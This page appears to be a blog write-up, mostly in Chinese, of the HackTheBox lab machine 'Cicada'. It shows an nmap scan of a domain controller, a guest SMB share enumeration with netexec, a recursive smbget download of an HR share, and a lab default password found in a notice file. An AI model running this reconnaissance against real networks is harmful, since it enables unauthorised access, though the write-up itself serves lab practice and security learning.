<!DOCTYPE html>
<html lang=en>
<head>
  <!-- bing -->
  <meta name="msvalidate.01" content="D6E6F0AB3EAD6BA4F5541EDCB8EEDCC5" />

  <!-- toc.js -->
  <script src='/js/toc.js'> </script>
  <script>
  window.addEventListener('hexo-blog-decrypt', function(event) {
    setTimeout(() => {
      makeList({
       'target': '#toc',   // Selector for element to place table of contents
       'parent': 'article .content' // Selector for element to parse headers from (default: 'body')
      });

      makeList({
       'target': '#toc-mobile',   // Selector for element to place table of contents
       'parent': 'article .content' // Selector for element to parse headers from (default: 'body')
      });
    }, 1000);
  });  
  </script>
  
  <!-- mane defined -->
  <script>
    function scriptOnError(errorMsg){
      try{ document.body.innerHTML = ""; }catch{}
      document.write("<h1>Error: Loading script error. </h1>");
      document.write("<p>Some script loading error, Please Disable AD Block and retry again.</p>");
      document.write("<p>很抱歉，有些脚本似乎無法正常加載，請嘗試關閉 AD Block 再試一次。</p>");
      document.write("<p>Error on loading: ");
      document.write(errorMsg);
      document.write("</p>");

      window.stop ? window.stop() : document.execCommand("Stop");
    }
  </script>

  <!-- GTM -->
  <script>
    if ((window.location.hostname != "localhost" ) && (window.location.hostname != "manesec.github.io") ){
        (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
          new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
          j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
          'https://www.googletagmanager.com/gtm.js?id='+i+dl;
          f.parentNode.insertBefore(j,f);
          })(window,document,'script','dataLayer','GTM-T952MB6B');
    }
  </script>

  <!-- clarity -->
  <script type="text/javascript">
      (function(c,l,a,r,i,t,y){
          c[a]=c[a]||function(){(c[a].q=c[a].q||[]).push(arguments)};
          t=l.createElement(r);t.async=1;t.src="https://www.clarity.ms/tag/"+i;
          y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y);
      })(window, document, "clarity", "script", "ph6eztilds");
  </script>

  <!-- check baseurl -->
  <script>
    setInterval( ()=>{
      if ((window.location.hostname != "localhost" ) && (window.location.hostname != "manesec.github.io") ){
          window.location.href = "https://manesec.github.io" + window.location.pathname;
      }
    }, 500);
  </script>

   <!-- fancybox support -->
   
     
<link rel="stylesheet" href="/js/fancybox/jquery.fancybox.min.css">

   

    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Recommand: Let’s Sign Up HTB Academy to get Higher level of knowledge :P 非常推薦: 想要變强嗎？ 快來加入 HTB Academy 獲得更高級的知識吧 :P Cicada​​ 這臺機器不需要太用腦，基本上流程就那樣。 當時SG的VIP+有問題，所以就導致沒有辦法拿更前的排名： ​​ ‍ Nmap123456789101112">
<meta property="og:type" content="article">
<meta property="og:title" content="HackTheBox - Machine - Cicada">
<meta property="og:url" content="https://manesec.github.io/2024/10/04/2024-htb-machine/40-Cicada/index.html">
<meta property="og:site_name" content="Mane">
<meta property="og:description" content="Recommand: Let’s Sign Up HTB Academy to get Higher level of knowledge :P 非常推薦: 想要變强嗎？ 快來加入 HTB Academy 獲得更高級的知識吧 :P Cicada​​ 這臺機器不需要太用腦，基本上流程就那樣。 當時SG的VIP+有問題，所以就導致沒有辦法拿更前的排名： ​​ ‍ Nmap123456789101112">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20240929035210-7x7fuef.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241004185659-i134bsh.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002014231-24q1y0m.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002014932-ssafrdt.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002015022-so69svm.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002015139-bo23tca.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002015407-58e39ae.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002015856-t9u1aya.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002015905-etrm08d.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002020524-kk4ume8.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002020610-jdjoau6.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002020652-romnv5m.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002020721-clpx93r.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002020747-htkqotd.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002020822-6jh0c3t.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002020855-l7ftizb.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002021045-g9l0ki3.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002021253-rap4jlb.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002021333-l2xf10d.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241004193428-cgis1i9.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241004193811-60qm2a9.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241004193822-gjqrn8f.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241004194100-mhzou6z.png">
<meta property="article:published_time" content="2024-10-04T11:18:20.000Z">
<meta property="article:modified_time" content="2025-02-16T09:24:32.374Z">
<meta property="article:author" content="manesec">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20240929035210-7x7fuef.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>HackTheBox - Machine - Cicada</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


<!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-T952MB6B"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->

  <script async src="https://www.googletagmanager.com/gtag/js?id=G-8C677QTBX9"></script>
  <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());
      gtag('config', 'G-8C677QTBX9');
  </script>


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2024/10/12/2024-htb-machine/41-Yummy/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2024/10/03/2024-htb-machine/39-EvilCUPS/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://manesec.github.io/2024/10/04/2024-htb-machine/40-Cicada/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://manesec.github.io/2024/10/04/2024-htb-machine/40-Cicada/&text=HackTheBox - Machine - Cicada"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://manesec.github.io/2024/10/04/2024-htb-machine/40-Cicada/&title=HackTheBox - Machine - Cicada"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://manesec.github.io/2024/10/04/2024-htb-machine/40-Cicada/&is_video=false&description=HackTheBox - Machine - Cicada"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=HackTheBox - Machine - Cicada&body=Check out this article: https://manesec.github.io/2024/10/04/2024-htb-machine/40-Cicada/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://manesec.github.io/2024/10/04/2024-htb-machine/40-Cicada/&title=HackTheBox - Machine - Cicada"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://manesec.github.io/2024/10/04/2024-htb-machine/40-Cicada/&title=HackTheBox - Machine - Cicada"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://manesec.github.io/2024/10/04/2024-htb-machine/40-Cicada/&title=HackTheBox - Machine - Cicada"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://manesec.github.io/2024/10/04/2024-htb-machine/40-Cicada/&title=HackTheBox - Machine - Cicada"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://manesec.github.io/2024/10/04/2024-htb-machine/40-Cicada/&name=HackTheBox - Machine - Cicada&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://manesec.github.io/2024/10/04/2024-htb-machine/40-Cicada/&t=HackTheBox - Machine - Cicada"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc"></div>
    <style>
    	#toc {
	}
    	#toc ul {
	   display: grid ! important;
	}
    	#toc li {
	   margin: 0 0 0 0 ! important;  
	}
	#toc .level-1 {
	   font-size: 0.8rem;
	   color: #ffffff ;
	   background: #2bbc8ae5;
	   padding-left: 3px;
           padding-right: 3px;
	}


	#toc .level-1:hover {
	   background: #00b4ddc7;
	   color: #ffffff !important;
	}

	#toc .level-2 {
	   font-size: 0.8rem;
	   color: #2bbc8a;
	}
	#toc .level-3 {
	   font-size: 0.7rem;
	   color: #40474b;
	}
	#toc .level-4 , #toc .level-5, #toc .level-6 {
	   font-size: 0.6rem;
	   color: #8c8c8c;
	}
    </style>
    
    
      <script>
      	setTimeout(() => {
	  makeList({
	     'target': '#toc',   // Selector for element to place table of contents
	     'parent': 'article .content' // Selector for element to parse headers from (default: 'body')
	  });
	}, 1000);
      </script>
     
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        HackTheBox - Machine - Cicada
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">manesec</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-10-04T11:18:20.000Z" class="dt-published" itemprop="datePublished">2024-10-04</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <p><strong>Recommand</strong>: <a target="_blank" rel="noopener" href="https://referral.hackthebox.com/mz8fyQS">Let’s Sign Up HTB Academy to get Higher level of knowledge :P</a></p>
<p><strong>非常推薦</strong>: <a target="_blank" rel="noopener" href="https://referral.hackthebox.com/mz8fyQS">想要變强嗎？ 快來加入 HTB Academy 獲得更高級的知識吧 :P</a></p>
<h1 id="Cicada"><a href="#Cicada" class="headerlink" title="Cicada"></a>Cicada</h1><p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20240929035210-7x7fuef.png" alt="image">​</p>
<p>這臺機器不需要太用腦，基本上流程就那樣。</p>
<p>當時SG的VIP+有問題，所以就導致沒有辦法拿更前的排名：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241004185659-i134bsh.png" alt="image">​</p>
<p>‍</p>
<h1 id="Nmap"><a href="#Nmap" class="headerlink" title="Nmap"></a>Nmap</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line">PORT      STATE SERVICE       REASON          VERSION</span><br><span class="line">53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus</span><br><span class="line">88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-10-02 00:33:13Z)</span><br><span class="line">135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC</span><br><span class="line">139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn</span><br><span class="line">389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)</span><br><span class="line">|_ssl-<span class="built_in">date</span>: TLS randomness does not represent time</span><br><span class="line">| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb</span><br><span class="line">| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:CICADA-DC.cicada.htb</span><br><span class="line">| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada</span><br><span class="line">| Public Key <span class="built_in">type</span>: rsa</span><br><span class="line">| Public Key bits: 2048</span><br><span class="line">| Signature Algorithm: sha256WithRSAEncryption</span><br><span class="line">| Not valid before: 2024-08-22T20:24:16</span><br><span class="line">| Not valid after:  2025-08-22T20:24:16</span><br><span class="line">| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65</span><br><span class="line">| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a</span><br><span class="line">| -----BEGIN CERTIFICATE-----</span><br><span class="line">| MIIF4DCCBMigAwIBAgITHgAAAAOY38QFU4GSRAABAAAAAzANBgkqhkiG9w0BAQsF</span><br><span class="line">| ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGY2ljYWRh</span><br><span class="line">| MRUwEwYDVQQDEwxDSUNBREEtREMtQ0EwHhcNMjQwODIyMjAyNDE2WhcNMjUwODIy</span><br><span class="line">| MjAyNDE2WjAfMR0wGwYDVQQDExRDSUNBREEtREMuY2ljYWRhLmh0YjCCASIwDQYJ</span><br><span class="line">| KoZIhvcNAQEBBQADggEPADCCAQoCggEBAOatZznJ1Zy5E8fVFsDWtq531KAmTyX8</span><br><span class="line">| BxPdIVefG1jKHLYTvSsQLVDuv02+p29iH9vnqYvIzSiFWilKCFBxtfOpyvCaEQua</span><br><span class="line">| NaJqv3quymk/pw0xMfSLMuN5emPJ5yHtC7cantY51mSDrvXBxMVIf23JUKgbhqSc</span><br><span class="line">| Srdh8fhL8XKgZXVjHmQZVn4ONg2vJP2tu7P1KkXXj7Mdry9GFEIpLdDa749PLy7x</span><br><span class="line">| o1yw8CloMMtcFKwVaJHy7tMgwU5PVbFBeUhhKhQ8jBR3OBaMBtqIzIAJ092LNysy</span><br><span class="line">| 4W6q8iWFc+Tb43gFP4nfb1Xvp5mJ2pStqCeZlneiL7Be0SqdDhljB4ECAwEAAaOC</span><br><span class="line">| Au4wggLqMC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8A</span><br><span class="line">| bABsAGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/</span><br><span class="line">| BAQDAgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3</span><br><span class="line">| DQMEAgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjAL</span><br><span class="line">| BglghkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFAY5YMN7</span><br><span class="line">| Sb0WV8GpzydFLPC+751AMB8GA1UdIwQYMBaAFIgPuAt1+B1uRE3nh16Q6gSBkTzp</span><br><span class="line">| MIHLBgNVHR8EgcMwgcAwgb2ggbqggbeGgbRsZGFwOi8vL0NOPUNJQ0FEQS1EQy1D</span><br><span class="line">| QSxDTj1DSUNBREEtREMsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2Vz</span><br><span class="line">| LENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Y2ljYWRhLERDPWh0Yj9j</span><br><span class="line">| ZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlz</span><br><span class="line">| dHJpYnV0aW9uUG9pbnQwgb0GCCsGAQUFBwEBBIGwMIGtMIGqBggrBgEFBQcwAoaB</span><br><span class="line">| nWxkYXA6Ly8vQ049Q0lDQURBLURDLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXkl</span><br><span class="line">| MjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPWNpY2Fk</span><br><span class="line">| YSxEQz1odGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmlj</span><br><span class="line">| YXRpb25BdXRob3JpdHkwQAYDVR0RBDkwN6AfBgkrBgEEAYI3GQGgEgQQ0dpG4APi</span><br><span class="line">| HkGYUf0NXWYT14IUQ0lDQURBLURDLmNpY2FkYS5odGIwDQYJKoZIhvcNAQELBQAD</span><br><span class="line">| ggEBAIrY4wzebzUMnbrfpkvGA715ds8pNq06CN4/24q0YmowD+XSR/OI0En8Z9LE</span><br><span class="line">| eytwBsFZJk5qv9yY+WL4Ubb4chKSsNjuc5SzaHxXAVczpNlH/a4WAKfVMU2D6nOb</span><br><span class="line">| xxqE1cVIcOyN4b3WUhRNltauw81EUTa4xT0WElw8FevodHlBXiUPUT9zrBhnvNkz</span><br><span class="line">| obX8oU3zyMO89QwxsusZ0TLiT/EREW6N44J+ROTUzdJwcFNRl+oLsiK5z/ltLRmT</span><br><span class="line">| P/gFJvqMFfK4x4/ftmQV5M3hb0rzUcS4NJCGtclEoxlJHRTDTG6yZleuHvKSN4JF</span><br><span class="line">| ji6zxYOoOznp6JlmbakLb1ZRLA8=</span><br><span class="line">|_-----END CERTIFICATE-----</span><br><span class="line">445/tcp   open  microsoft-ds? syn-ack ttl 127</span><br><span class="line">464/tcp   open  kpasswd5?     syn-ack ttl 127</span><br><span class="line">593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0</span><br><span class="line">636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)</span><br><span class="line">..........</span><br><span class="line">3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)</span><br><span class="line">..........</span><br><span class="line">|_ssl-<span class="built_in">date</span>: TLS randomness does not represent time</span><br><span class="line">3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)</span><br><span class="line">..........</span><br><span class="line">5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)</span><br><span class="line">|_http-title: Not Found</span><br><span class="line">|_http-server-header: Microsoft-HTTPAPI/2.0</span><br><span class="line">60279/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC</span><br><span class="line">Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>一上來就探測下，什麽也沒有，看起來是純AD。</p>
<h1 id="Reading-file-with-null-session"><a href="#Reading-file-with-null-session" class="headerlink" title="Reading file with null session"></a>Reading file with null session</h1><p>因爲有smb，所以使用 null session看看裏面有沒有文件，</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">$ netexec smb 10.129.6.115 -u <span class="string">&#x27;guest&#x27;</span> -p <span class="string">&#x27;&#x27;</span> --shares</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        [+] cicada.htb\guest: </span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        [*] Enumerated shares</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        Share           Permissions     Remark</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        -----           -----------     ------</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        ADMIN$                          Remote Admin</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        C$                              Default share</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        DEV                         </span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        HR              READ        </span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        IPC$            READ            Remote IPC</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        NETLOGON                        Logon server share </span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        SYSVOL                          Logon server share </span><br><span class="line">                                                                                                     </span><br></pre></td></tr></table></figure>

<p>可以看到HR這個文件夾有讀取的權限，於是下載來看看：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ smbget --recursive smb://10.129.6.115/HR</span><br></pre></td></tr></table></figure>

<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002014231-24q1y0m.png" alt="image">​</p>
<p>只有一個文件叫  <code>Notice from HR.txt</code>​，</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">cat</span> Notice\ from\ HR.txt </span><br><span class="line"></span><br><span class="line">Dear new hire!</span><br><span class="line"></span><br><span class="line">Welcome to Cicada Corp! We<span class="string">&#x27;re thrilled to have you join our team. As part of our security protocols, it&#x27;</span>s essential that you change your default password to something unique and secure.</span><br><span class="line"></span><br><span class="line">Your default password is: Cicada<span class="variable">$M6Corpb</span>*@Lp<span class="comment">#nZp!8</span></span><br><span class="line"></span><br><span class="line">To change your password:</span><br><span class="line"></span><br><span class="line">1. Log <span class="keyword">in</span> to your Cicada Corp account** using the provided username and the default password mentioned above.</span><br><span class="line">2. Once logged <span class="keyword">in</span>, navigate to your account settings or profile settings section.</span><br><span class="line">3. Look <span class="keyword">for</span> the option to change your password. This will be labeled as <span class="string">&quot;Change Password&quot;</span>.</span><br><span class="line">4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.</span><br><span class="line">5. After changing your password, make sure to save your changes.</span><br><span class="line"></span><br><span class="line">Remember, your password is a crucial aspect of keeping your account secure. Please <span class="keyword">do</span> not share your password with anyone, and ensure you use a complex password.</span><br><span class="line"></span><br><span class="line">If you encounter any issues or need assistance with changing your password, don<span class="string">&#x27;t hesitate to reach out to our support team at support@cicada.htb.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Best regards,</span></span><br><span class="line"><span class="string">Cicada Corp</span></span><br><span class="line"><span class="string"></span></span><br></pre></td></tr></table></figure>

<p>裏面有一個默認密碼：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Cicada<span class="variable">$M6Corpb</span>*@Lp<span class="comment">#nZp!8</span></span><br></pre></td></tr></table></figure>

